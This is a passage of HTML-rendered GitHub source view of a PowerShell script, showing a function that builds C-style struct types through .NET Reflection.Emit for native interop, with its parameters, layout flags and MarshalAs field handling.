js-file-line\"><span class=\"pl-c\">        } -ExplicitLayout</span></td>\n      </tr>\n      <tr>\n        <td id=\"L591\" class=\"blob-num js-line-number\" data-line-number=\"591\"></td>\n        <td id=\"LC591\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L592\" class=\"blob-num js-line-number\" data-line-number=\"592\"></td>\n        <td id=\"LC592\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"><span class=\"pl-c\">        <span class=\"pl-c1\">.</span><span class=\"pl-k\">NOTES</span></span></span></td>\n      </tr>\n      <tr>\n        <td id=\"L593\" class=\"blob-num js-line-number\" data-line-number=\"593\"></td>\n        <td id=\"LC593\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\"></span></td>\n      </tr>\n      <tr>\n        <td id=\"L594\" class=\"blob-num js-line-number\" data-line-number=\"594\"></td>\n        <td id=\"LC594\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        PowerShell purists may disagree with the naming of this function but</span></td>\n      </tr>\n      <tr>\n        <td id=\"L595\" class=\"blob-num js-line-number\" data-line-number=\"595\"></td>\n        <td id=\"LC595\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        again, this was developed in such a way so as to emulate a &quot;C style&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L596\" class=\"blob-num js-line-number\" data-line-number=\"596\"></td>\n        <td id=\"LC596\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        definition as closely as possible. Sorry, I&#39;m not going to name it</span></td>\n      </tr>\n      <tr>\n        <td id=\"L597\" class=\"blob-num js-line-number\" data-line-number=\"597\"></td>\n        <td id=\"LC597\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        New-Struct. :P</span></td>\n      </tr>\n      <tr>\n        <td id=\"L598\" class=\"blob-num js-line-number\" data-line-number=\"598\"></td>\n        <td id=\"LC598\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-c\">        #&gt;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L599\" class=\"blob-num js-line-number\" data-line-number=\"599\"></td>\n        <td id=\"LC599\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L600\" class=\"blob-num js-line-number\" data-line-number=\"600\"></td>\n        <td id=\"LC600\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-ent\">[OutputTyp<span class=\"pl-ent\">e</span></span><span class=\"pl-e\">([<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Type</span><span class=\"pl-smi\">]</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L601\" class=\"blob-num js-line-number\" data-line-number=\"601\"></td>\n        <td id=\"LC601\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L602\" class=\"blob-num js-line-number\" data-line-number=\"602\"></td>\n        <td id=\"LC602\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L603\" class=\"blob-num js-line-number\" data-line-number=\"603\"></td>\n        <td id=\"LC603\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 1</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L604\" class=\"blob-num js-line-number\" data-line-number=\"604\"></td>\n        <td id=\"LC604\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateScrip<span class=\"pl-ent\">t</span></span><span class=\"pl-e\">({(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Emit.ModuleBuilder]</span></span></span>)</span> -or <span class=\"pl-e\">(<span class=\"pl-k\">$</span><span class=\"pl-c1\">_</span> -<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">is</span> <span class=\"pl-smi\">[Reflection.Assembly]</span></span></span>)</span>})<span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L605\" class=\"blob-num js-line-number\" data-line-number=\"605\"></td>\n        <td id=\"LC605\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L606\" class=\"blob-num js-line-number\" data-line-number=\"606\"></td>\n        <td id=\"LC606\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L607\" class=\"blob-num js-line-number\" data-line-number=\"607\"></td>\n        <td id=\"LC607\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 2</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L608\" class=\"blob-num js-line-number\" data-line-number=\"608\"></td>\n        <td id=\"LC608\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNullOrEmpt<span class=\"pl-ent\">y</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L609\" class=\"blob-num js-line-number\" data-line-number=\"609\"></td>\n        <td id=\"LC609\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[String]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L610\" class=\"blob-num js-line-number\" data-line-number=\"610\"></td>\n        <td id=\"LC610\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L611\" class=\"blob-num js-line-number\" data-line-number=\"611\"></td>\n        <td id=\"LC611\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L612\" class=\"blob-num js-line-number\" data-line-number=\"612\"></td>\n        <td id=\"LC612\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[Paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Position</span> =<span class=\"pl-smi\"> 3</span></span></span>, <span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span> =<span class=\"pl-smi\"> $True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L613\" class=\"blob-num js-line-number\" data-line-number=\"613\"></td>\n        <td id=\"LC613\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[ValidateNotNullOrEmpt<span class=\"pl-ent\">y</span></span><span class=\"pl-e\">()</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L614\" class=\"blob-num js-line-number\" data-line-number=\"614\"></td>\n        <td id=\"LC614\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Hashtable]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L615\" class=\"blob-num js-line-number\" data-line-number=\"615\"></td>\n        <td id=\"LC615\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructFields</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L616\" class=\"blob-num js-line-number\" data-line-number=\"616\"></td>\n        <td id=\"LC616\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L617\" class=\"blob-num js-line-number\" data-line-number=\"617\"></td>\n        <td id=\"LC617\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Reflection.Emit.PackingSize]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L618\" class=\"blob-num js-line-number\" data-line-number=\"618\"></td>\n        <td id=\"LC618\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">PackingSize</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Reflection.Emit.PackingSize]</span>::Unspecified<span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L619\" class=\"blob-num js-line-number\" data-line-number=\"619\"></td>\n        <td id=\"LC619\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L620\" class=\"blob-num js-line-number\" data-line-number=\"620\"></td>\n        <td id=\"LC620\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[Switch]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L621\" class=\"blob-num js-line-number\" data-line-number=\"621\"></td>\n        <td id=\"LC621\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">ExplicitLayout</span></td>\n      </tr>\n      <tr>\n        <td id=\"L622\" class=\"blob-num js-line-number\" data-line-number=\"622\"></td>\n        <td id=\"LC622\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L623\" class=\"blob-num js-line-number\" data-line-number=\"623\"></td>\n        <td id=\"LC623\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L624\" class=\"blob-num js-line-number\" data-line-number=\"624\"></td>\n        <td id=\"LC624\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span> <span class=\"pl-k\">-is</span> <span class=\"pl-e\">[Reflection.Assembly]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L625\" class=\"blob-num js-line-number\" data-line-number=\"625\"></td>\n        <td id=\"LC625\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L626\" class=\"blob-num js-line-number\" data-line-number=\"626\"></td>\n        <td id=\"LC626\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">return</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.GetType</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L627\" class=\"blob-num js-line-number\" data-line-number=\"627\"></td>\n        <td id=\"LC627\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L628\" class=\"blob-num js-line-number\" data-line-number=\"628\"></td>\n        <td id=\"LC628\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L629\" class=\"blob-num js-line-number\" data-line-number=\"629\"></td>\n        <td id=\"LC629\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-e\">[Reflection.TypeAttributes]</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&#39;AnsiClass,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L630\" class=\"blob-num js-line-number\" data-line-number=\"630\"></td>\n        <td id=\"LC630\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-s\">            Class,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L631\" class=\"blob-num js-line-number\" data-line-number=\"631\"></td>\n        <td id=\"LC631\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-s\">            Public,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L632\" class=\"blob-num js-line-number\" data-line-number=\"632\"></td>\n        <td id=\"LC632\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-s\">            Sealed,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L633\" class=\"blob-num js-line-number\" data-line-number=\"633\"></td>\n        <td id=\"LC633\" class=\"blob-code blob-code-inner js-file-line\"><span class=\"pl-s\">            BeforeFieldInit&#39;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L634\" class=\"blob-num js-line-number\" data-line-number=\"634\"></td>\n        <td id=\"LC634\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L635\" class=\"blob-num js-line-number\" data-line-number=\"635\"></td>\n        <td id=\"LC635\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ExplicitLayout</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L636\" class=\"blob-num js-line-number\" data-line-number=\"636\"></td>\n        <td id=\"LC636\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L637\" class=\"blob-num js-line-number\" data-line-number=\"637\"></td>\n        <td id=\"LC637\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span> <span class=\"pl-k\">-bor</span> <span class=\"pl-e\">[Reflection.TypeAttributes]</span>::ExplicitLayout</td>\n      </tr>\n      <tr>\n        <td id=\"L638\" class=\"blob-num js-line-number\" data-line-number=\"638\"></td>\n        <td id=\"LC638\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L639\" class=\"blob-num js-line-number\" data-line-number=\"639\"></td>\n        <td id=\"LC639\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L640\" class=\"blob-num js-line-number\" data-line-number=\"640\"></td>\n        <td id=\"LC640\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L641\" class=\"blob-num js-line-number\" data-line-number=\"641\"></td>\n        <td id=\"LC641\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span> <span class=\"pl-k\">-bor</span> <span class=\"pl-e\">[Reflection.TypeAttributes]</span>::SequentialLayout</td>\n      </tr>\n      <tr>\n        <td id=\"L642\" class=\"blob-num js-line-number\" data-line-number=\"642\"></td>\n        <td id=\"LC642\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L643\" class=\"blob-num js-line-number\" data-line-number=\"643\"></td>\n        <td id=\"LC643\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L644\" class=\"blob-num js-line-number\" data-line-number=\"644\"></td>\n        <td id=\"LC644\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Module</span><span class=\"pl-en\">.DefineType</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FullName</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructAttributes</span><span class=\"pl-k\">,</span> <span class=\"pl-e\">[ValueType]</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">PackingSize</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L645\" class=\"blob-num js-line-number\" data-line-number=\"645\"></td>\n        <td id=\"LC645\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ConstructorInfo</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[Runtime.InteropServices.MarshalAsAttribute]</span>.GetConstructors<span class=\"pl-k\">()</span><span class=\"pl-e\">[</span><span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L646\" class=\"blob-num js-line-number\" data-line-number=\"646\"></td>\n        <td id=\"LC646\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">SizeConst</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[Runtime.InteropServices.MarshalAsAttribute]</span>.GetField<span class=\"pl-k\">(</span><span class=\"pl-s\">&#39;SizeConst&#39;</span><span class=\"pl-k\">))</span></td>\n      </tr>\n      <tr>\n        <td id=\"L647\" class=\"blob-num js-line-number\" data-line-number=\"647\"></td>\n        <td id=\"LC647\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L648\" class=\"blob-num js-line-number\" data-line-number=\"648\"></td>\n        <td id=\"LC648\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Fields</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Hashtable<span class=\"pl-e\">[]</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">StructFields</span><span class=\"pl-en\">.Count</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L649\" class=\"blob-num js-line-number\" data-line-number=\"649\"></td>\n        <td id=\"LC649\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L650\" class=\"blob-num js-line-number\" data-line-number=\"650\"></td>\n        <td id=\"LC650\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># Sort each field according to the orders specified</span></td>\n      </tr>\n      <tr>\n        <td id=\"L651\" class=\"blob-num js-line-number\" data-line-number=\"651\"></td>\n        <td id=\"LC651\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># Unfortunately, PSv2 doesn&#39;t have the luxury of the</span></td>\n      </tr>\n      <tr>\n        <td id=\"L652\" class=\"blob-num js-line-number\" data-line-number=\"652\"></td>\n        <td id=\"LC652\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\"># hashtable [Ordered] accelerator.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L653\" class=\"blob-num js-line-number\" data-line-number=\"653\"></td>\n        <td id=\"LC653\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">foreach</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructFields</span><span class=\"pl-en\">.Keys</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L654\" class=\"blob-num js-line-number\" data-line-number=\"654\"></td>\n        <td id=\"LC654\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L655\" class=\"blob-num js-line-number\" data-line-number=\"655\"></td>\n        <td id=\"LC655\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Index</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructFields</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span><span class=\"pl-e\">][</span><span class=\"pl-s\">&#39;Position&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L656\" class=\"blob-num js-line-number\" data-line-number=\"656\"></td>\n        <td id=\"LC656\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Fields</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Index</span><span class=\"pl-e\">]</span> <span class=\"pl-k\">=</span> @{FieldName <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span><span class=\"pl-k\">;</span> Properties <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructFields</span><span class=\"pl-e\">[</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span><span class=\"pl-e\">]</span>}</td>\n      </tr>\n      <tr>\n        <td id=\"L657\" class=\"blob-num js-line-number\" data-line-number=\"657\"></td>\n        <td id=\"LC657\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L658\" class=\"blob-num js-line-number\" data-line-number=\"658\"></td>\n        <td id=\"LC658\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L659\" class=\"blob-num js-line-number\" data-line-number=\"659\"></td>\n        <td id=\"LC659\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">foreach</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span> <span class=\"pl-k\">in</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Fields</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L660\" class=\"blob-num js-line-number\" data-line-number=\"660\"></td>\n        <td id=\"LC660\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L661\" class=\"blob-num js-line-number\" data-line-number=\"661\"></td>\n        <td id=\"LC661\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldName</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;FieldName&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L662\" class=\"blob-num js-line-number\" data-line-number=\"662\"></td>\n        <td id=\"LC662\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldProp</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Field</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;Properties&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L663\" class=\"blob-num js-line-number\" data-line-number=\"663\"></td>\n        <td id=\"LC663\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L664\" class=\"blob-num js-line-number\" data-line-number=\"664\"></td>\n        <td id=\"LC664\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Offset</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldProp</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;Offset&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L665\" class=\"blob-num js-line-number\" data-line-number=\"665\"></td>\n        <td id=\"LC665\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldProp</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;Type&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L666\" class=\"blob-num js-line-number\" data-line-number=\"666\"></td>\n        <td id=\"LC666\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldProp</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;MarshalAs&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L667\" class=\"blob-num js-line-number\" data-line-number=\"667\"></td>\n        <td id=\"LC667\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L668\" class=\"blob-num js-line-number\" data-line-number=\"668\"></td>\n        <td id=\"LC668\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">NewField</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">StructBuilder</span><span class=\"pl-en\">.DefineField</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">FieldName</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Type</span><span class=\"pl-k\">,</span> <span class=\"pl-s\">&#39;Public&#39;</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L669\" class=\"blob-num js-line-number\" data-line-number=\"669\"></td>\n        <td id=\"LC669\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L670\" class=\"blob-num js-line-number\" data-line-number=\"670\"></td>\n        <td id=\"LC670\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L671\" class=\"blob-num js-line-number\" data-line-number=\"671\"></td>\n        <td id=\"LC671\" class=\"blob-code blob-code-inner js-file-line\">            {</td>\n      </tr>\n      <tr>\n        <td id=\"L672\" class=\"blob-num js-line-number\" data-line-number=\"672\"></td>\n        <td id=\"LC672\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">$</span><span class=\"pl-smi\">UnmanagedType</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span><span class=\"pl-e\">[</span><span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-e\">]</span> <span class=\"pl-k\">-as</span> <span class=\"pl-k\">(</span><span class=\"pl-e\">[Runtime.InteropServices.UnmanagedType]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L673\" class=\"blob-num js-line-number\" data-line-number=\"673\"></td>\n        <td id=\"LC673\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">if</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span><span class=\"pl-e\">[</span><span class=\"pl-c1\"><span class=\"pl-c1\">1</span></span><span class=\"pl-e\">]</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L674\" class=\"blob-num js-line-number\" data-line-number=\"674\"></td>\n        <td id=\"LC674\" class=\"blob-code blob-code-inner js-file-line\">                {</td>\n      </tr>\n      <tr>\n        <td id=\"L675\" class=\"blob-num js-line-number\" data-line-number=\"675\"></td>\n        <td id=\"LC675\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">Size</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">MarshalAs</span><span class=\"pl-e\">[</span><span class=\"pl-c1\"><span class=\"pl-c1\">1</span></span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L676\" class=\"blob-num js-line-number\" data-line-number=\"676\"></td>\n        <td id=\"LC676\" class=\"blob-code blob-code-inner js-file-line\">                    <span class=\"pl-k\">$</span><span class=\"pl-smi\">AttribBuilder</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> Reflection.Emit.CustomAttributeBuilder<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">ConstructorInfo</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L677\" class=\"blob-num js-line-number\" data-line-number=\"677\"></td>\n        <td id=\"LC677\" class=\"blob-code blob-code-inner js-file-line\">                        <span class=\"pl-k\">$</span><span class=\"pl-smi\">UnmanagedType</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">SizeConst</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">@($</span><span class=\"pl-smi\">Size</span><span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L678\" class=\"blob-num js-line-number\" data-line-number=\"678\"></td>\n        <td id=\"LC678\" class=\"blob-code blob-code-inner js-file-line\">                }</td>\n      </tr>\n      <tr>\n        <td id=\"L679\" class=\"blob-num js-line-number\" data-line-number=\"679\"></td>\n        <td id=\"LC679\" class=\"blob-code blob-code-inner js-file-line\">                <span class=\"pl-k\">else</span></td>\n      </tr>\n      <tr>\n        <td id=\"L680\" class=\"blob-num js-line-number\" data-line-number=\"680\"></td>\n        <td id=\"LC680\" 